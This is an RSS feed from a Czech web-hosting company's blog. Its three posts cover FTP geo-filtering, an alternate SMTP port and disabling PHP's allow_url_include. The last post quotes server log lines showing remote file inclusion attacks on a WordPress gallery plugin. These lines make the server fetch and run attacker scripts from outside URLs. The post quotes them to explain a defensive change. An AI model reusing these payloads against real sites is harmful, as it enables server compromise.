<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Online Hosting - blog &#187; Konfigurace a nastavení</title>
	<atom:link href="http://www.onlinehosting.cz/blog/kategorie/konfigurace-a-nastaveni/feed" rel="self" type="application/rss+xml" />
	<link>http://www.onlinehosting.cz/blog</link>
	<description>WebHosting pro náročné</description>
	<lastBuildDate>Sat, 17 Dec 2011 14:27:30 +0000</lastBuildDate>
	<language>cs</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
		<item>
		<title>Zavedli jsme filtraci FTP &#8211; připojit se lze jen z Česka a dalších okolních zemí</title>
		<link>http://www.onlinehosting.cz/blog/zavedli-jsme-filtraci-ftp-pripojit-se-lze-jen-z-ceska-a-dalsich-okolnich-zemi</link>
		<comments>http://www.onlinehosting.cz/blog/zavedli-jsme-filtraci-ftp-pripojit-se-lze-jen-z-ceska-a-dalsich-okolnich-zemi#comments</comments>
		<pubDate>Mon, 08 Jun 2009 14:13:58 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Konfigurace a nastavení]]></category>
		<category><![CDATA[Online Hosting]]></category>
		<category><![CDATA[Filtrace]]></category>
		<category><![CDATA[FTP]]></category>
		<category><![CDATA[Útoky]]></category>
		<category><![CDATA[WebFTP]]></category>

		<guid isPermaLink="false">http://www.onlinehosting.cz/blog/zavedli-jsme-filtraci-ftp-pripojit-se-lze-jen-z-ceska-a-dalsich-okolnich-zemi</guid>
		<description><![CDATA[Vzhledem ke stále častějším útokům ze zahraničí na webové stránky skrz ftp účet, jsme provedli následující opatření. Na ftp účet se lze nyní připojit standardní cestou (tj. na port 21) jen z Česka, Slovenska, Německa, Rakouska a Polska. Pro ty &#8230; <a href="http://www.onlinehosting.cz/blog/zavedli-jsme-filtraci-ftp-pripojit-se-lze-jen-z-ceska-a-dalsich-okolnich-zemi">Celý příspěvek <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>Vzhledem ke stále častějším útokům ze zahraničí na webové stránky skrz ftp účet, jsme provedli následující opatření. Na <strong>ftp</strong> účet se lze nyní připojit standardní cestou (tj. na port 21) jen z <strong>Česka, Slovenska, Německa, Rakouska a Polska</strong>.</p>
<p>Pro ty z vás, kteří se potřebují připojovat ze zahraničí, jsme zřídili extra port <strong>10021</strong>, který není filtrovaný a <strong>umožňuje připojení odkudkoliv</strong>.</p>
<p>Pokud se tedy chcete připojit na ftp ze zahraničí, stačí v <strong>Total Commanderu</strong> zadat jako hostitele <em>vase_domena.cz:10021</em>.</p>
<p>Pokud byste se nemohli připojit a zároveň byste byli za proxy serverem nebo firewallem, který neumožňuje připojení k ftp na jiný port než 21, <a href="http://www.onlinehosting.cz/kontakt.htm">kontaktujte</a> nás. Povolíme vám přístup z konkrétní IP adresy.</p>
<p>Služba <strong>Webftp</strong> (webový přístup k FTP) tímto dotčená není. Přes ni se lze připojit odkudkoliv. Prozatím se filtrace týká webhostingu Online.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.onlinehosting.cz/blog/zavedli-jsme-filtraci-ftp-pripojit-se-lze-jen-z-ceska-a-dalsich-okolnich-zemi/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Druhý smtp port pro odesílání pošty</title>
		<link>http://www.onlinehosting.cz/blog/druhy-smtp-port-pro-odesilani-posty</link>
		<comments>http://www.onlinehosting.cz/blog/druhy-smtp-port-pro-odesilani-posty#comments</comments>
		<pubDate>Mon, 01 Jun 2009 14:16:52 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Konfigurace a nastavení]]></category>
		<category><![CDATA[Online Hosting]]></category>
		<category><![CDATA[Antispam]]></category>
		<category><![CDATA[Blacklist]]></category>
		<category><![CDATA[Email]]></category>
		<category><![CDATA[Emailserver]]></category>
		<category><![CDATA[SMTP]]></category>
		<category><![CDATA[Spam]]></category>
		<category><![CDATA[Virus]]></category>

		<guid isPermaLink="false">http://www.onlinehosting.cz/blog/druhy-smtp-port-pro-odesilani-posty</guid>
		<description><![CDATA[Jelikož stále více wifi poskytovatelů, hotelů apod. blokují odesílání pošty přes standardní smtp port 25, zprovoznili jsme druhý port pro odesílání pošty, a to 10025. Často se k těmto sítím připojují zavirované počítače rozesílající tisíce spamů denně, tím se jednak &#8230; <a href="http://www.onlinehosting.cz/blog/druhy-smtp-port-pro-odesilani-posty">Celý příspěvek <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>Jelikož stále více wifi poskytovatelů, hotelů apod. blokují odesílání pošty přes standardní smtp port 25, zprovoznili jsme druhý port pro odesílání pošty, a to <strong>10025</strong>.</p>
<p>Často se k těmto sítím připojují zavirované počítače rozesílající tisíce spamů denně, tím se jednak poskytovatel dostává rychle na spamový blacklist (které na našem emailserveru také používáme), a zároveň také rapidně zpomaluje rychlost internetu. Proto se mnoho poskytovatelů uchyluje k filtrování odchozích připojení na port 25, a tím pádem nelze přes náš smtp server odesílat poštu.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.onlinehosting.cz/blog/druhy-smtp-port-pro-odesilani-posty/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Zakázali jsme u funkcí include a require načítání zdrojového kódu z cizích webserverů</title>
		<link>http://www.onlinehosting.cz/blog/zakazali-jsme-u-funkci-include-a-require-nacitani-zdrojoveho-kodu-z-cizich-webserveru</link>
		<comments>http://www.onlinehosting.cz/blog/zakazali-jsme-u-funkci-include-a-require-nacitani-zdrojoveho-kodu-z-cizich-webserveru#comments</comments>
		<pubDate>Mon, 08 Dec 2008 21:52:43 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Konfigurace a nastavení]]></category>
		<category><![CDATA[Online Hosting]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[bezpečnost]]></category>
		<category><![CDATA[útok]]></category>

		<guid isPermaLink="false">http://www.onlinehosting.cz/blog/zakazali-jsme-u-funkci-include-a-require-nacitani-zdrojoveho-kodu-z-cizich-webserveru</guid>
		<description><![CDATA[Z důvodu nárůstu útoků na webové aplikace jsme na všech serverech zakázali u funkce Include a Require načtení zdrojového souboru z cizího webové serveru, tj. přes http nebo ftp. Na funkce fopen() by tato změna neměla mít vliv. Pokud byste &#8230; <a href="http://www.onlinehosting.cz/blog/zakazali-jsme-u-funkci-include-a-require-nacitani-zdrojoveho-kodu-z-cizich-webserveru">Celý příspěvek <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>Z důvodu nárůstu útoků na webové aplikace jsme na všech serverech zakázali u funkce <strong>Include</strong> a <strong>Require</strong> načtení zdrojového souboru z <strong>cizího</strong> webové serveru, tj. přes <strong>http</strong> nebo <strong>ftp</strong>. Na funkce <strong>fopen()</strong> by tato změna neměla mít vliv. Pokud byste potřebovali nahrávat věci z cizího serveru, použijte buď již zmiňovanou funkci <strong>fopen()</strong> nebo <strong>file_get_contents()</strong>.</p>
<p>Zákaz jsme provedli přes direktivu <strong>allow_url_include = Off</strong>.</p>
<p>A jak takový útok např. může vypadat? Ukázka z logu &#8211; komentář snad netřeba:</p>
<p><code>xxxx.cz 80.254.74.63 - - [08/Dec/2008:18:11:18 +0100] "GET /?myPath=http://www.freewebs.com/albalbo/xx.txt?? HTTP/1.1" 200 229 "-" "Mozilla/3.0 (compatible; Indy Library)"</code></p>
<p>xxxx.cz 80.254.74.63 &#8211; - [08/Dec/2008:18:11:14 +0100] &#8222;GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.freewebs.com/albalbo/xx.txt?? HTTP/1.1&#8243; 200 229 &#8222;-&#8220; &#8222;Mozilla/3.0 (compatible; Indy Library)&#8220;</p>
<p>xxxx.cz 80.254.74.63 &#8211; - [08/Dec/2008:18:14:33 +0100] &#8222;GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.freewebs.com/albalbo/xx.txt?? HTTP/1.1&#8243; 200 229 &#8222;-&#8220; &#8222;Mozilla/3.0 (compatible; Indy Library)&#8220;</p>
<p>xxxx.cz 76.162.254.213 &#8211; - [08/Dec/2008:18:58:40 +0100] &#8222;GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://pastebin.linode.com/?dl=1581??? HTTP/1.1&#8243; 200 227 &#8222;-&#8220; &#8222;Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1&#8243;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.onlinehosting.cz/blog/zakazali-jsme-u-funkci-include-a-require-nacitani-zdrojoveho-kodu-z-cizich-webserveru/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

